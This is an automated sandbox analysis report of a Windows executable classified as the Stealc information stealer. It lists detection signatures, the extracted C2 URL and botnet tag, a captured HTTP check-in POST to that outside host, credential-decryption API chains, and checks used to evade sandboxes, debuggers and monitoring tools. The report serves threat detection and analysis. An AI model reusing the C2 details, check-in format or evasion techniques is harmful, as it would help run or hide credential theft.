Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1528566
MD5:a5d18ff9a3069cd251170021b5a0da87
SHA1:2bf3ebe6be6c5a2892335cee98d6e338506458d0
SHA256:5ec5e0e9c3636bbf6380c00672bf9c8fb36ec1aef7095cc051243ad8830ca23a
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6996 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A5D18FF9A3069CD251170021B5A0DA87)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1312008954.00000000019DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1268244294.00000000055E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6996JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6996JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.c30000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-08T02:10:03.429876+020020442431Malware Command and Control Activity Detected192.168.2.749700185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.c30000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 44%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00C3C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C39AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00C39AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C37240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00C37240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C39B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00C39B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C48EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00C48EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C44910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C3DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C3E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C44570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C3ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C43EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C3F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C3BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C3DE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49700 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHCGIJECFIECBFIDGDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 34 35 32 42 31 34 32 30 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 2d 2d 0d 0a Data Ascii: ------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="hwid"FC452B14208B2768236643------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="build"doma------IJEHCGIJECFIECBFIDGD--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C36280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00C36280
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHCGIJECFIECBFIDGDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 34 35 32 42 31 34 32 30 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 2d 2d 0d 0a Data Ascii: ------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="hwid"FC452B14208B2768236643------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="build"doma------IJEHCGIJECFIECBFIDGD--
                Source: file.exe, 00000000.00000002.1312008954.00000000019DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&
                Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
                Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
                Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpD
                Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpWindows
                Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpj
                Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7D8F30_2_00F7D8F3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100303F0_2_0100303F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFB9B60_2_00FFB9B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010008C80_2_010008C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A0B000_2_010A0B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010043370_2_01004337
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109FBC00_2_0109FBC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF6A100_2_00FF6A10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC63E70_2_00EC63E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCACD10_2_00FCACD1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFD4AF0_2_00FFD4AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF84AA0_2_00FF84AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE7C6F0_2_00FE7C6F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010074780_2_01007478
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9FD860_2_00F9FD86
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFED710_2_00FFED71
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB9D7F0_2_00EB9D7F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC85590_2_00FC8559
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7A52D0_2_00F7A52D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F936FE0_2_00F936FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF4EF20_2_00FF4EF2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBA6700_2_00FBA670
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF9F140_2_00FF9F14
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00C345C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: iobnflrc ZLIB complexity 0.9950398838512677
                Source: file.exe, 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1268244294.00000000055E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C48680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00C48680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C43720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00C43720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\8WKA33ZC.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 44%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1811968 > 1048576
                Source: file.exeStatic PE information: Raw size of iobnflrc is bigger than: 0x100000 < 0x194400

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.c30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iobnflrc:EW;wmcwbjql:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iobnflrc:EW;wmcwbjql:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C49860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c383e should be: 0x1bc65d
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: iobnflrc
                Source: file.exeStatic PE information: section name: wmcwbjql
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7D8F3 push 1F85631Dh; mov dword ptr [esp], edi0_2_00F7D91F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7D8F3 push 29E8C224h; mov dword ptr [esp], ecx0_2_00F7D93F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7D8F3 push ecx; mov dword ptr [esp], 347E4400h0_2_00F7D9D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7D8F3 push 106E71FAh; mov dword ptr [esp], ecx0_2_00F7DA1C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7D8F3 push ebx; mov dword ptr [esp], ecx0_2_00F7DA51
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7D8F3 push edx; mov dword ptr [esp], ecx0_2_00F7DAA7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7D8F3 push 2C3A27B4h; mov dword ptr [esp], eax0_2_00F7DAD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7D8F3 push edx; mov dword ptr [esp], 7C611043h0_2_00F7DAEF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107591A push ebp; mov dword ptr [esp], esp0_2_01075956
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107591A push edi; mov dword ptr [esp], ebx0_2_01075994
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107591A push edx; mov dword ptr [esp], ebp0_2_010759B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107591A push 3A42E8B0h; mov dword ptr [esp], ebx0_2_010759D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A512D push edx; mov dword ptr [esp], edi0_2_010A51DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102492B push edi; mov dword ptr [esp], edx0_2_010249BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AF126 push eax; mov dword ptr [esp], ecx0_2_010AF16A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107613E push ebx; mov dword ptr [esp], 737F9D55h0_2_01076171
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107613E push 466C34BEh; mov dword ptr [esp], eax0_2_010761BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107613E push 2304F14Dh; mov dword ptr [esp], edx0_2_0107621B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D0154 push 33B43508h; mov dword ptr [esp], ebp0_2_010D0198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C496C push 6AE3FDC8h; mov dword ptr [esp], esi0_2_010C4B0C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102E96F push 40AA7A5Ah; mov dword ptr [esp], edx0_2_0102E9DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01023172 push ebp; mov dword ptr [esp], ecx0_2_01023191
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01023172 push edi; mov dword ptr [esp], esi0_2_0102320F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111396C push 55323F00h; mov dword ptr [esp], eax0_2_01113993
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103A995 push eax; mov dword ptr [esp], 7B888394h0_2_0103A9E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107C9A7 push ecx; mov dword ptr [esp], 01EA5E69h0_2_0107C9F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010609EC push 4067DDF3h; mov dword ptr [esp], esp0_2_01060A00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010609EC push edx; mov dword ptr [esp], 6EFB6871h0_2_01060F6B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010609EC push ebp; mov dword ptr [esp], ebx0_2_010611C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4B035 push ecx; ret 0_2_00C4B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010989F7 push ebp; mov dword ptr [esp], 4DC2865Ah0_2_010994DF
                Source: file.exeStatic PE information: section name: iobnflrc entropy: 7.954448270760046

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C49860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13542
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100D0F4 second address: 100D10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8114E11BEFh 0x00000009 jo 00007F8114E11BE6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C18C second address: 100C1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8114B92466h 0x0000000a jl 00007F8114B92466h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F8114B92473h 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C4B5 second address: 100C4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C4C0 second address: 100C4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C4C6 second address: 100C4CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C4CA second address: 100C4CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
